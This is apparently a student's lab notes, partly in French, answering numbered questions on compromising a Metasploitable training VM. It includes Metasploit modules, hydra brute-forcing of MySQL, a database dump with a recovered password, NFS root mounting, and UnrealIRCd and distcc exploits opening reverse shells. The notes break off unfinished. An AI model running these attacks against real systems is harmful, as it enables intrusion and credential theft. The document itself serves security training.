Metasploitable

.\VBoxManage.exe modifyvm Metasploitable --acpi off
.\VBoxManage.exe modifyvm Metasploitable --ioapic off

# Question 1
services -p 3306 -u -R
services -p 80 -u -R
services -p 21 -u -R

# Question 2
db_nmap -v -T4 -n 172.16.2.12 -p- -sT

# Question 3
search nfs
use auxiliary/scanner/nfs/nfsmount
info
set RPORT 111
set RHOSTS 172.16.2.12 
run
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 172.16.2.12:111       - 172.16.2.12 Mountable NFS Export: / [*]
[*] 172.16.2.12:111       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# Question 4
apt install nfs-common
sudo mkdir /opt/metasploitable
sudo mount 172.16.2.12:/ /opt/metasploitable

# Question 5
set PASS_FILE /usr/share/john/password.lst
set STOP_ON_SUCCESS true
set RHOSTS 172.16.2.12
set THREADS 4

# Question 6 
// Ne fonctionne pas
- 172.16.2.12:3306 - LOGIN FAILED: root: (Unable to Connect: invalid packet: scramble_length(0) != length of scramble(21))
hydra -l root -P /usr/share/john/password.lst mysql://172.16.2.12 -t 32 -I

# Question 7
mysql --skip-ssl -h 172.16.2.12 -u root -p monsitepourri 
mysqldump --skip-ssl --default-character-set=latin1 -h 172.16.2.12 -u root -p monsitepourri > dumpsql
sql> select * from access

mot de passe de batman: SupermanEstClarkKent!	

# Question 8
search scanner postgre
use scanner/postgres/postgres_login
set RHOSTS 172.16.2.12
set STOP_ON_SUCCESS true
set USERNAME root
run

# Question 9
[+] 172.16.2.12:5432 - Login Successful: postgres:postgres@template1

# Question 10
psql -h 172.16.2.12 -U postgres
postgres=# select version();
                                            version                                            
-----------------------------------------------------------------------------------------------
 PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

# Question 11
search ircd 
use exploit/unix/irc/unreal_ircd_3281_backdoor
show payloads 
set payload 6
set LHOST 172.16.2.13
=> reverse shell -> whoami root

# Question 12 
3632 est le port de distccd, le démon de compilation distribuée (distcc) pour C et C++.

# Question 13
search distccd 
use exploit/unix/misc/distcc_exec
show options 
show payloads
set RHOSTS 172.16.2.12
set LHOST 172.16.2.13
set payload 6
=> Reverse Shell -> whoami daemon

# Question 14
smbclient -N -L 172.16.2.12

# Question 15
use auxiliary/admin/smb/samba_symlink_traversal
set rhosts 172.16.2.12
set smbshare tmp
run

Le partage vulnérable est tmp (/tmp).

# Question 16
smbclient --no-pass //172.16.2.12/tmp

# Question 17 et 18
-> A revoir

# Question 19